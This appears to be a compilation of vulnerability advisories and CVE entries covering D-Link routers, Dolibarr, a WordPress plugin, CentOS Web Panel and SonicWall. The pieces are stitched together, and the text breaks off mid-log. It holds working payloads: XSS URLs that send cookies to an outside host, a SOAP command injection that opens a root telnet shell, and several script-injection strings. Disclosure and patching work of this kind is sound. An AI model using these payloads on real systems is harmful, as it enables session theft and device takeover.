OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.

**0x00 Product Description**

Dlink is a multinational networking equipment manufacturing corporation.

The Dlink 860L/865L/868L/880L are wireless "Cloud" Router.

The vulnerabilities details are as follows:

Vendor: D-Link

Devices: DIR-880 REVA / DIR-868 REVA / DIR-865 / DIR-860 REVA

Firmware:

DIR-880L\_REVA\_FIRMWARE\_PATCH\_1.08B04

DIR868LA1\_FW112b04

DIR-865L\_REVA\_FIRMWARE\_PATCH\_1.08.B01

DIR860LA1\_FW110b04

**0x01 Vulnerabilities Summary**

The Dlink 860L/865L/868L/880L is a router overall badly designed with a lot of vulnerabilities.

My research in analyzing the security of Dlink routers starts from a recent security contest organized by a security company.

**0x02 The summary of the vulnerabilities is:**

1.  WAN && LAN - revA/B - XSS - CVE-2018-6527, CVE-2018-6528, CVE-2018-6529
2.  LAN - revA/B - OS command injection - CVE-2018-6530

**0x03 Details - WAN && LAN - revA/B - XSS**

After analyzing PHP files inside /htdocs/webinc, I found several trivial XSS vulnerabilities.

An attacker can use the XSS to target an authenticated user in order to steal the authentication cookies.

1.  xss inside /htdocs/webinc/body/bsc\_sms\_send.php

\[…\]
                <span class="value">
                        <input id="receiver" type="text" size="50" maxlength="15" value="<? echo $\_GET\["receiver"\]; ?>"/>
                </span>
\[…\]

An attacker could lure the victim to inadvertently open this vulnerable page as an authenticated user: http://192.168.0.1/bsc\_sms\_send.php?receiver="><script>window.open('http://9.9.9.9:9999/cookie.asp?msg='+document.cookie)</script><"

2.  xss inside /htdocs/ webinc/js/adv\_parent\_ctrl\_map.php

\[…\]
                var msgArray =
                \[
                        '<?echo i18n("You have successfully configured your router to use OpenDNS Parental Control.");?>',
                        '<?echo i18n("Do you want to test the function?");?>',
                        '<p><input type="button" value="<?echo i18n('Test');?>" onclick="window.open(\\'http://www.opendns.com/device/welcome/?device\_id=<? echo $\_GET\["deviceid"\];?>\\')" /\><input type\="button" value\="<?echo i18n('Return');?>" onClick\="self.location.href=\\'adv\_parent\_ctrl.php\\';" /></p\>'
                \];
                BODY.ShowMessage('<?echo i18n("OpenDNS PARENTAL CONTROLS");?>', msgArray);
\[…\]

An attacker could lure the victim to inadvertently open this vulnerable page as an authenticated user: http://192.168.0.1/adv\_parent\_ctrl\_map.php?deviceid=whatever\\');window.open(\\'http://9.9.9.9:9999/cookie.asp?msg=\\'+document.cookie

3.  xss inside /htdocs/ webinc/js/bsc\_sms\_inbox.php

\[…\]
        InitValue: function(xml)
        {
                var get\_Treturn = '<?if($\_GET\["Treturn"\]=="") echo "0"; else echo $\_GET\["Treturn"\];?>';		
         … 
        }
\[…\]

An attacker could lure the victim to inadvertently open this vulnerable page as an authenticated user: http://192.168.0.1/bsc\_sms\_inbox.php?Treturn=0';window.open('http://9.9.9.9:9999/cookie.asp?msg='+document.cookie);get\_Treturn='1

**0x04 Details - LAN - revA/B - Command injection in SOAP controlType url interface**

The vulnerability occurs in /htdocs/cgibin which is executed by the web server for, just handles almost http requests from WAN and LAN, and my research in analyzing SOAP interface started from a security analysis report regarding UPNP protocol, then I reviewed the SOAP interface, which is handled by the soapcgi\_main function in cgibin, seems to have been mostly overlooked.

It should be noted that you could insert and execute malicious commands without privilege, meanwhile the injection point is the service field which is passed to soap.cgi to indicate control type, this exploitation also works even if invalid SOAPAction and whatever XML stream in a request.

Here’s the code in C to show some details about this issue:

/\* Grab a pointer to the request url \*/
requri \= getenv("REQUEST\_URI");
/\* goto failure if the urquri does not start with "?service=" \*/
if((query \= strchr(requri, "?")) \== NULL or strncmp(query, "?service=", strlen("?service=")))
{
    goto failure\_condition;
}
/\* Point the control type field pointer 9 bytes beyond the requri \*/ 
controlType \= query + strlen("?service=");

... ...

/\* Create/open a shell script using the specified control type string \*/
sprintf(filename, "%s/%s\_%d.sh", "/var/run", controlType, getpid());
fn \= fopen(filename "a+");
/\* Write self-deleting command into the srcipt and execute it by "sh -c"\*/
if(fn)
{
    fprintf(fn, "rm -f %s/%s\_%d.sh", "/var/run", controlType, getpid());
    fclose(fn);
    sprintf(filename, "%s/%s\_%d.sh", "/var/run", controlType, getpid());
    system(filename);
}

Proof of concept:

    POST /soap.cgi?service=whatever-control;iptables -P INPUT ACCEPT;iptables -P FORWARD ACCEPT;iptables -P OUTPUT ACCEPT;iptables -t nat -P PREROUTING ACCEPT;iptables -t nat -P OUTPUT ACCEPT;iptables -t nat -P POSTROUTING ACCEPT;telnetd -p 9999;whatever-invalid-shell HTTP/1.1
    Host: 192.168.100.1:49152
    Accept-Encoding: identity
    Content-Length: 16
    SOAPAction: "whatever-serviceType#whatever-action"
    Content-Type: text/xml
    
    whatever-content
    
    Here, we can easily build a soap http request and embed malicious command that spawns a telnet server on WAN that provides an unauthenticated root shell into it, and then login into router using telnet:
    $ telnet 192.168.0.1 9999
    Trying 192.168.0.1...
    Connected to 192.168.0.1.
    Escape character is '^]'.
    

**0x05 Report Timeline**

Dec 8, 2017: Vulnerabilities found.

Jul 18, 2018: Reported to security@dlink.com.

Jul 18, 2018: The vendor followed up and made a schedule to fix it.

Feb 1, 2018: Reported those security issues to MITRE.

Feb 1, 2018: MITRE provides CVE-2018-6527, CVE-2018-6528, CVE-2018-6529, CVE-2018-6530.

Mar 1, 2018: The vendor release security announcement for customers.

Mar 2, 2018: I decide to make a public disclosure.

**0x06 Credits**

These vulnerabilities were found by Kaixiang Zhang.

**0x07 References****DIR-880L RevA**

Release Notes - ftp://ftp2.dlink.com/SECURITY\_ADVISEMENTS/DIR-880L/REVA/DIR-880L\_REVA\_FIRMWARE\_PATCH\_NOTES\_1.08B06\_EN\_WW.pdf

Firmware - ftp://FTP2.DLINK.COM/SECURITY\_ADVISEMENTS/DIR-880L/REVA/DIR-880L\_REVA\_FIRMWARE\_PATCH\_v1.08B06\_BETA.zip

**DIR-865L RevA**

Release Notes - ftp://ftp2.dlink.com/SECURITY\_ADVISEMENTS/DIR-865L/REVA/DIR-865L\_REVA\_FIRMWARE\_PATCH\_NOTES\_1.10B01\_EN\_WW.pdf

Firmware - ftp://FTP2.DLINK.COM/SECURITY\_ADVISEMENTS/DIR-865L/REVA/DIR-865L\_REVA\_FIRMWARE\_PATCH\_v1.10B01\_BETA.zip

**DIR-868L RevA**

Release Notes - ftp://ftp2.dlink.com/SECURITY\_ADVISEMENTS/DIR-868L/REVA/DIR-868L\_REVA\_FIRMWARE\_PATCH\_NOTES\_1.20B01\_EN\_WW.pdf

Firmware - ftp://FTP2.DLINK.COM/SECURITY\_ADVISEMENTS/DIR-868L/REVA/DIR-868L\_REVA\_FIRMWARE\_PATCH\_v1.20B01\_BETA.zip

**DIR-860L RevA**

Release Notes - ftp://ftp2.dlink.com/SECURITY\_ADVISEMENTS/DIR-860L/REVA/DIR-860L\_REVA\_FIRMWARE\_PATCH\_NOTES\_1.11B01\_EN\_WW.pdf

Firmware - ftp://FTP2.DLINK.COM/SECURITY\_ADVISEMENTS/DIR-860L/REVA/DIR-860L\_REVA\_FIRMWARE\_PATCH\_v1.11B01\_BETA.zip

CVE-2018-6530: GitHub - soh0ro0t/Pwn-Multiple-Dlink-Router-Via-Soap-Proto: 日前我发现了D-Link DIR 880L/865L/868L/860L路由器存在多个XSS和命令注入漏洞，最主要的问题是路由器未对用户输入进行检查，导致恶意数据请求被执行，最终被远程攻击者控制整个设备。

zzcms 8.2 allows remote attackers to discover the full path via a direct request to 3/qq_connect2.0/API/class/ErrorCase.class.php or 3/ucenter_api/code/friend.php.

CVE-2018-7434

Dolibarr version 6.0.2 contains a Cross Site Scripting (XSS) vulnerability in Product details that can result in execution of javascript code.

**Bug**

Stored Cross-site scripting (XSS) using product page, bypassing XSS detection

**Environment**

*   **Version**: 6.0.2
*   **OS**: Ubuntu
*   **Web server**: Apache
*   **PHP**: 7.0
*   **Database**: MySQL
*   **URL(s)**: product/card.php?id=1929&mainmenu=home

**Expected and actual behavior****Expected behaviour**

XSS detector picks up on the payload and refuses to save it

**Actual behaviour**

XSS payload is saved with no interference from the detector. When visiting the page later, the payload executes.

**Steps to reproduce the behavior**

1.  Log into Dolibarr with a user who can edit the name of a product
2.  Choose a product (this products name will be changed FYI), and click on the modify details button
3.  Append the following payload to the product's current name: <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

**Suggested implementation**

Change the detector to now pick up on similar payloads (including this one)

CVE-2017-1000509: Stored Cross-site scripting (XSS) in product page · Issue #7727 · Dolibarr/dolibarr

admin/partials/wp-splashing-admin-main.php in the Splashing Images plugin (wp-splashing-images) before 2.1.1 for WordPress allows authenticated (administrator, editor, or author) remote attackers to conduct PHP Object Injection attacks via crafted serialized data in the 'session' HTTP GET parameter to wp-admin/upload.php.

Timestamp:

01/22/2018 07:29:38 PM (5 years ago)

janhenckens

Message:

Security update  

Location:

wp-splashing-images/trunk

Files:

  

*   README.txt (2 diffs)
*   admin/partials/wp-splashing-admin-main.php (1 diff)
*   admin/partials/wp-splashing-admin-sidebar.php (1 diff)
*   wp-splashing-images.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **wp-splashing-images/trunk/README.txt**
    
    r1799926
    
    r1807349
    
     
    
    5
    
    5
    
    Requires at least: 4.0
    
    6
    
    6
    
    Tested up to: 4.9.1
    
    7
    
     
    
    Stable tag: 2.1.0
    
     
    
    7
    
    Stable tag: 2.1.1
    
    8
    
    8
    
    License: GPLv2 or later
    
    9
    
    9
    
    License URI: http://www.gnu.org/licenses/gpl-2.0.html
    
    …
    
    …
    
     
    
    33
    
    33
    
    \== Changelog ==
    
    34
    
    34
    
     
    
    35
    
    \= 2.1.1 =
    
     
    
    36
    
    \* Fixed 2 security issues
    
     
    
    37
    
    35
    
    38
    
    \= 2.1 =
    
    36
    
    39
    
    \* Updated unsplash library and use the new download function
    
*   **wp-splashing-images/trunk/admin/partials/wp-splashing-admin-main.php**
    
    r1799926
    
    r1807349
    
     
    
    20
    
    20
    
        </h1>
    
    21
    
    21
    
            <?php if($\_GET\['session'\]) {
    
    22
    
     
    
    23
    
     
    
                $data = unserialize(base64\_decode($\_GET\['session'\]));
    
     
    
    22
    
                $data = unserialize(base64\_decode($\_GET\['session'\]), \['allowed\_classes' => false\]);
    
    24
    
    23
    
                $this->unsplash->saveTokens($data\['token'\]);
    
    25
    
    24
    
                $user = $this->unsplash->getUser(); ?>
    
*   **wp-splashing-images/trunk/admin/partials/wp-splashing-admin-sidebar.php**
    
    r1675965
    
    r1807349
    
     
    
    7
    
    7
    
                    <form id="splashing-search" method="get" action="<?php echo esc\_url(admin\_url('admin-post.php')); ?>">
    
    8
    
    8
    
                        <label class="screen-reader-text" for="post-search-input">Search Posts:</label>
    
    9
    
     
    
                        <input type="search" id="post-search-input-splashing" name="search" value="<?php echo $\_GET\['search'\]; ?>" placeholder="<?php \_e('Search unsplash.com', 'wp-splashing-images'); ?>">
    
     
    
    9
    
                        <input type="search" id="post-search-input-splashing" name="search" value="<?php echo sanitize\_title\_for\_query($\_GET\['search'\]); ?>" placeholder="<?php \_e('Search unsplash.com', 'wp-splashing-images'); ?>">
    
    10
    
    10
    
                        <input type="hidden" name="action" value="wp\_splashing\_search">
    
    11
    
    11
    
                        <input type="hidden" name="paged" value="1">
    
*   **wp-splashing-images/trunk/wp-splashing-images.php**
    
    r1799926
    
    r1807349
    
     
    
    17
    
    17
    
     \* Plugin URI:        http://studioespresso.co
    
    18
    
    18
    
     \* Description:       Unsplash.com), right in your dashboard. Add photos with one click and use them in your content right away.
    
    19
    
     
    
     \* Version:           2.1.0
    
     
    
    19
    
     \* Version:           2.1.1
    
    20
    
    20
    
     \* Author:            Studio Espresso
    
    21
    
    21
    
     \* Author URI:        http://studioespresso.co
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2018-6195: Changeset 1807349 for wp-splashing-images – WordPress Plugin Repository

CentOS-WebPanel.com (aka CWP) CentOS Web Panel through v0.9.8.12 has XSS via the `module` value of the `index.php` file.

Document Title: =============== CentOS Web Panel v0.9.8.12 - CS Cross Site Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get\_content.php?id=1835 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5961 CVE-ID: ======= CVE-2018-5961 Release Date: ============= 2018-01-17 Vulnerability Laboratory ID (VL-ID): ==================================== 1835 Common Vulnerability Scoring System: ==================================== 4 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== CentOS Web Panel - Free Web Hosting control panel is designed for quick and easy management of (Dedicated & VPS) servers without of need to use ssh console for every little thing. There is lot's of options and features for server management in this control panel. CWP automatically installs full LAMP on your server (apache,php, phpmyadmin, webmail, mailserver…). (Copy of the Homepage: http://centos-webpanel.com/features ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a client-side cross site scripting vulnerability in the CentOS Web Panel v0.9.8.12. Vulnerability Disclosure Timeline: ================================== 2017-01-15: Non-Public Disclosure (Vulnerability Laboratory - Shared Customer Research Feed) Discovery Status: ================= Published Affected Product(s): ==================== CWP Product: CentOS Web Panel - (CWP) 0.9.8.12 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Open Authentication (Anonymous Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A client-side cross site scripting web vulnerability has been discovered in the official CentOS Web Panel v0.9.8.12. The vulnerability allows remote attackers to inject script code to the client-side browser to application requests. The client-side cross site web vulnerability is located in the \`module\` value of the \`index.php\` file GET method request. The vulnerability can be exploited by remote attackers with a prepared malicious link to the centos web-panel application. The request method to inject is GET and the attack vector is non-persistent. The injection point is the module parameter and the execution point occurs in the module exception. The security risk of the client-side vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3. Exploitation of the non-persisten vulnerability requires no privileged web-application user account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected or connected application modules. Request Method(s): \[+\] GET Vulnerable Module(s): \[+\] index.php Vulnerable Parameter(s): \[+\] module Proof of Concept (PoC): ======================= The cross site scripting vulnerability can be exploited by remote attackers without privileged web-application user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Dork(s): "powered by CentOS-WebPanel.com" PoC: Payload(s) http://localhost:2030/index.php?module=clam%3E%22%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C http://localhost:2030/index.php?module=clam PoC: Exception-Handling

The module clam>"<\[CLIENT SIDE SCRIPT CODE PAYLOAD EXECUTION!\]> does not exist.

\--- PoC Session Logs \[POST\] --- Status: 200\[OK\] GET http://localhost:2030/index.php?module=clam%3E%22%3Ciframesrc=a%20onload=alert(document.cookie)%20%3C Mime Type\[text/html\] Request Header: Host\[localhost:2030\] User-Agent\[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0\] Accept\[text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8\] Cookie\[cwpsrv-3cc0cea69668d490e1029c2a41ce5df3=8fnvi0bqgjj162mqklruu8clq5; PHPSESSID=8dsrha0ivd80kkgukvklgvmct1\] Connection\[keep-alive\] Response Header: Server\[Apache/2.2.27 (Unix) mod\_ssl/2.2.27 OpenSSL/1.0.1e-fips PHP/5.4.27\] X-Powered-By\[PHP/5.4.27\] Expires\[Thu, 19 Nov 1981 08:52:00 GMT\] Keep-Alive\[timeout=5, max=100\] Connection\[Keep-Alive\] Transfer-Encoding\[chunked\] Content-Type\[text/html\] Reference(s): http://localhost:2030/index.php Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable module parameter in the index-php file GET method request. Disallow special chars and restrict the parameter input to prevent further client-side script code injection attacks. Encode the output of the error exception for invalid inputs to prevent the execution point of the client-side vulnerability. Security Risk: ============== The security risk of the client-side cross site scripting web vulnerability in the centos web panel is estimated as medium. Credits & Authors: ================== Vulnerability-Lab \[admin@vulnerability-lab.com\] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss\_upcoming.php - vulnerability-lab.com/rss/rss\_news.php Social: twitter.com/vuln\_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2017 | Vulnerability Laboratory - \[Evolution Security GmbH\]™

CVE-2018-5961

index.php in CentOS-WebPanel.com (aka CWP) CentOS Web Panel through v0.9.8.12 has XSS via the id parameter to the phpini_editor module or the email_address parameter to the mail_add-new module.

Reference(s): http://localhost:2030/index.php?module=mail\_add-new Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable \`id\` and \`email address\` parameters of the index.php file POST method request. Disallow usage of special chars and restrict the parameter input to prevent application-side script code injection attacks. Filter in the output error or the item listing the vulnerable location were the code executes. Security Risk: ============== The security risk of the application-side input validation vulnerabilities in the web-application are estimated as medium. (CVSS 4.4) Credits & Authors: ================== Benjamin K.M. \[bkm@vulnerability-lab.com\] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss\_upcoming.php - vulnerability-lab.com/rss/rss\_news.php Social: twitter.com/vuln\_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - \[Evolution Security GmbH\]™

CVE-2018-5962

SonicWall SonicOS on Network Security Appliance (NSA) 2017 Q4 devices has XSS via the CFS Custom Category and Cloud AV DB Exclusion Settings screens.

Document Title: =============== SonicWall SonicOS NSA - Bypass & Persistent Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get\_content.php?id=1729 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5281 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5280 CVE-ID: ======= CVE-2018-5281 Release Date: ============= 2018-01-04 Vulnerability Laboratory ID (VL-ID): ==================================== 1729 Common Vulnerability Scoring System: ==================================== 4.5 Vulnerability Class: ==================== Multiple Current Estimated Price: ======================== 2.000€ - 3.000€ Product & Service Introduction: =============================== Achieve a deeper level of security with the SonicWALL Network Security Appliance (NSA) Series of next-generation firewalls. NSA Series appliances integrate automated and dynamic security capabilities into a single platform, combining the patented1, SonicWALL Reassembly Free Deep Packet Inspection (RFDPI) firewall engine with a powerful, massively scalable, multi-core architecture. Now you can block even the most sophisticated threats with an intrusion prevention system (IPS) featuring advanced anti-evasion capabilities, SSL decryption and inspection, and network-based malware protection that leverages the power of the cloud. (Copy of the Homepage: http://www.sonicwall.com/products/sonicwall-nsa/ ) The proven SonicOS architecture is at the core of every Dell SonicWALL firewall from the SuperMassive™ E10800 to the TZ 100. SonicOS uses deep packet inspection technology in combination with multi-core specialized security microprocessors to deliver application intelligence, control, and real-time visualization, intrusion prevention, high-speed virtual private networking (VPN) technology and other robust security features. (Copy of the Homepage: http://www.sonicwall.com/network-security-os-platform/ ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered a filter bypass issue and an application-side vulnerability in the official DELL SonicWall SonicOS NSA Series web-application firewall (utm) appliances. Vulnerability Disclosure Timeline: ================================== 2018-01-04: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== DELL SonicWall Product: Sonicwall SonicOS (all versions) Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A filter bypass issue and an application-side web vulnerability has been discovered in the official SonicWall NSA Web-Firewall Appliance Series with SonicOS. The filter bypass issue allows an attacker to bypass a restricted mechanism or a filter protection to finally evade the controls of the web-application. The \`Security Service\` section with the \`Content Filter\` module allows an attacker to bypass the regular web-filter validation mechanism. Remote attackers with privileged appliance user accounts are able to inject own malicious script codes on the application-side of the affected modules. The filter of the \`CFS Custom Category\` module with the \`Add\` function allows an attacker to bypass the regular web-filter validation of the web-application. As far as an attacker injects in the \`CFS Custom Category\` a payload to the as \`Name\`, he will be forced to use only words without script code by a secure exception-handling. In the Formular of the Edit procedure is also an \`Update\` function available. Remote attackers with local low privileged user accounts are able to bypass the name input validation the following way. First the attacker inserts a regular domain, after that the update function is available. Now the attacker injects his payload to the \` Content\` input field and clicks update to the already temporarily stored entry. Now the illegal payload is inside the listing and can be saved via \`OK\` for further manipulation to compromise the web appliance of sonicwall. The vulnerable files were the injection point is located are \`addTrustedDomainDlg.html\` and \`gavCloudExclusions.html\`. The final script code execution occurs in the \`main.html or index\` file. The same filter bypass issue is located in the \`Cloud AV DB Exclusion Settings\` module with the vulnerable \`Cloud AV Signature ID\` input field context as well. After the context is include an application-side script code execution occurs in the main listing of the \`CFS Custom Category\`. The validation does not encode the input of the Edit formular and sends the context to the item listing in the index of the content filter module. The attack vector of the issue is located on the application-side and the request method to inject is POST. The security risk of the filter bypass and persistent validation vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.5. Exploitation of the persistent input validation web vulnerability requires a low privileged or restricted web-application user account and low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules. Request Method(s): \[+\] POST Vulnerable Module(s): \[+\] CFS Custom Category \[+\] Cloud AV DB Exclusion Settings Vulnerable File(s): \[+\] addTrustedDomainDlg.html \[+\] gavCloudExclusions.html Vulnerable Inputs(s): \[+\] Name \[+\] Content \[+\] Cloud AV Signature ID Vulnerable Parameter(s): \[+\] cfsRatingObjectName \[+\] selectedItem \[+\] itemList \[+\] cfsRatingDomainList \[+\] gav\_cloud\_exclude\_list \[+\] inputbox \[+\] list Affected Module(s): \[+\] CFS Custom Category - Item Listing (Name & Content) \[+\] Gateway Anti-Virus Signatures - Item Listing (Name & Content) Proof of Concept (PoC): ======================= The filter bypass and application-side input validation vulnerability can be exploited by remote attackers with privileged web-application user account and low or medium user interaction For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the appliance web-application (nsa series) 2. Login to the application 3. Switch to the Security Services 4. Open the Content Filter module 5. Scroll down and click in the \`CFS Custom Category\` the \`Add\` button 6. Now, a new form opens with several inputs Note: To edit existing items the item listing or to add new context to the item listing 7. Include a regular name and a basic content as domain name 8. Save the entry temporarily via \`Add\` to the edit list 9. Choose the same track that you added and include a script code payload after the domainname 10. Now, click on update (Note via Add!) 11. The illegal domain context is now saved Note: We used the update function to bypass the protected Add mechanism 12. Click the Ok button to save the entry to the dbms of the appliance web-application 13. The code executes directly in the item list of the CFS Custom Category module next to the add function 14. Successful reproduce of the filter bypass issue and persistent vulnerability! --- Session Logs (Standard Request) --- Status: pending\[\] POST https://utm\_waf.sonicwall.localhost:8351/main.cgi Mime Type\[unknown\] Request Header: Host\[utm\_waf.sonicwall.localhost:8351\] User-Agent\[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\] Accept\[text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8\] Accept-Language\[de,en-US;q=0.7,en;q=0.3\] Accept-Encoding\[gzip, deflate\] Referer\[https://utm\_waf.sonicwall.localhost:8351/addCfsLocalRating\_-1.html\] Cookie\[curUrl=securityServicesCFView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 777=0; 7433=divHAInterfaces; 7513=0\] POST-Daten: csrfToken\[\] cfsRatingObjectName\[test23\] cfsRatingCategory\[2\] selectedItem\[test.com\] itemList\[test.com\] cfsRatingDomainList\[test.com\] refresh\_page\[securityServicesCFView.html\] tableIndex\[-1\] cgiaction\[%5Bobject+Window%5D\] --- PoC Session Logs (POST) \[Inject\] #1 --- Status: pending\[\] POST https://utm\_waf.sonicwall.localhost:8351/main.cgi Mime Type\[unknown\] Request Header: Host\[utm\_waf.sonicwall.localhost:8351\] User-Agent\[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\] Accept\[text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8\] Accept-Language\[de,en-US;q=0.7,en;q=0.3\] Accept-Encoding\[gzip, deflate\] Referer\[https://utm\_waf.sonicwall.localhost:8351/addCfsLocalRating\_-1.html\] Cookie\[curUrl=systemStatusView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 777=0; 7433=divHAInterfaces; 7513=0\] POST-Daten: csrfToken\[\] cfsRatingObjectName\[+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%2823%29%3B%3EMALIICOUS INJECTED PAYLOAD!\] cfsRatingCategory\[9\] selectedItem\[testdomain.com++%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%2823%29%3B%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E\] itemList\[testdomain.com++%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%2823%29%3B%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E\] cfsRatingDomainList\[testdomain.com++%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dprompt%2823%29%3B%26gt%3B+++%22%26gt%3B%26lt%3B%22%26lt%3Bimg+src%3D%22x%22%26gt%3B%2520%2520%26gt%3B%22%26lt%3Biframe+src%3Da%26gt%3B%2520%26lt%3Biframe%26gt%3B\] refresh\_page\[securityServicesCFView.html\] tableIndex\[-1\] cgiaction\[%5Bobject+Window%5D\] --- PoC Session Logs (POST) \[Inject\] #2 --- Status: pending\[\] POST https://utm\_waf.sonicwall.localhost:8351/main.cgi Mime Type\[unknown\] Request Header: Host\[utm\_waf.sonicwall.localhost:8351\] User-Agent\[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\] Accept\[text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8\] Accept-Language\[de,en-US;q=0.7,en;q=0.3\] Accept-Encoding\[gzip, deflate\] Referer\[https://utm\_waf.sonicwall.localhost:8351/gavCloudExclusions.html\] Cookie\[curUrl=gavSummary.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 